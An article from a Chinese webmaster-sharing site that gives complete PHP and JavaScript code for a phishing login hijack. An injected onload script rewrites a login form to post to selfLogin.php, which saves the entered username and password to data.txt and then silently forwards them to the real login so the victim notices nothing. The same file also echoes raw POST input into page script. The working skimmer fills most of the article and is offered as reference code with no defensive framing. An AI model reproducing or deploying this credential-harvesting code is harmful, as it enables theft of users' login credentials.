www.adminn.cn
站长正能量分享网!

PHP和JS实现模仿登录钓鱼的代码示例

AD:阿里云服务器企业会员更优惠 腾讯云香港,韩国免备案服务器1.8折优惠

本篇文章给大家带来的内容是关于PHP和JS实现模仿登录钓鱼的代码示例,有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助。

目录介绍

login.php 正常登录的文件

selfLogin.php 自定义的登录文件

data.txt 记录用户输入的数据

login.php

  1. <?php 
  2.  
  3.     echo "<pre>"
  4.  
  5.     $userInfo = $_POST ; 
  6.  
  7.     if ($userInfo) { 
  8.  
  9.         # code… 
  10.  
  11.         var_dump($userInfo,'登录成功') ;exit(); 
  12.  
  13.     } 
  14.  
  15.  
  16.  
  17. ?> 
  18.  
  19. <!DOCTYPE html> 
  20.  
  21. <html> 
  22.  
  23. <head> 
  24.  
  25.     <title>登录</title> 
  26.  
  27. </head> 
  28.  
  29. <body> 
  30.  
  31.     <form id="login" method="post" action="login.php"
  32.  
  33.         用户姓名:<input type="text" name="name"
  34.  
  35.         用户密码:<input type="password" name="pwd"
  36.  
  37.         <input type="submit" value="确认登录"
  38.  
  39.     </form> 
  40.  
  41. </body> 
  42.  
  43. <script type="text/javascript"
  44.  
  45.  
  46.  
  47.     //js劫持代码 
  48.  
  49.     window.onload = function (eve) { 
  50.  
  51.         var form = document.getElementById('login'); 
  52.  
  53.         form.innerHTML = ' <form id="login" method="post" > 用户姓名:<input type="text" name="name"> 用户密码:<input type="password" name="pwd"> <input type="submit" value="确认登录">    </form> '  ; 
  54.  
  55.         //钓鱼地址 
  56.  
  57.         form.action = "selfLogin.php" ; 
  58.  
  59.     } 
  60.  
  61. </script> 
  62.  
  63. </html> 

selfLogin.php

  1. <?php 
  2.  
  3.     $name = '' ; 
  4.  
  5.     $pwd  = '' ; 
  6.  
  7.     //var_dump('数据被截取了',$_POST) ; 
  8.  
  9.     if($_POST) { 
  10.  
  11.         //记录获取的数据信息 
  12.  
  13.         $name = $_POST['name'] ; 
  14.  
  15.         $pwd = $_POST['pwd'] ; 
  16.  
  17.         file_put_contents('data.txt', json_encode($_POST,true)) ; 
  18.  
  19.     } 
  20.  
  21. ?> 
  22.  
  23. <!DOCTYPE html> 
  24.  
  25. <html> 
  26.  
  27. <head> 
  28.  
  29.     <title></title> 
  30.  
  31. </head> 
  32.  
  33. <body> 
  34.  
  35.  
  36.  
  37. </body> 
  38.  
  39. <script type="text/javascript"
  40.  
  41.     //构建之前的页面 
  42.  
  43.     window.onload = function (eve) { 
  44.  
  45.         var name = '<?php echo $name; ?>' ; 
  46.  
  47.         var pwd = '<?php echo $pwd; ?>' ; 
  48.  
  49.         if(name && pwd) { 
  50.  
  51.             var p = document.createElement('p'); 
  52.  
  53.             document.body.appendChild(p); 
  54.  
  55.             p.innerHTML =' <form id="login2" method="post" action="login.php" > '
  56.  
  57.                 ' 用户姓名:<input type="text" name="name" value="'+name+'"> 用户密码:<input type="password" name="pwd" value="'+pwd+'"> '  ; 
  58.  
  59.             document.getElementById('login2').submit(); 
  60.  
  61.         } 
  62.  
  63.     } 
  64.  
  65. </script> 
  66.  
  67. </html> 

data.txt

{"name":"admin","pwd":"123456"}

模板优惠价: (点击购买)
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《PHP和JS实现模仿登录钓鱼的代码示例》
文章链接:https://www.adminn.cn/news/7717.html
本站资源模板仅供个人学习交流,请于下载后24小时内删除,不允许用于商业用途,否则法律问题自行承担。2021.5月起,网站调整,暂不再分享免费模板。谢谢理解

Adminn.Cn 站长分享圈

帝国CMS精品模板腾讯云优惠券,代金券

2次开发,学习研究使用!扫码支付后联系QQ677123发货!

支付宝扫一扫打赏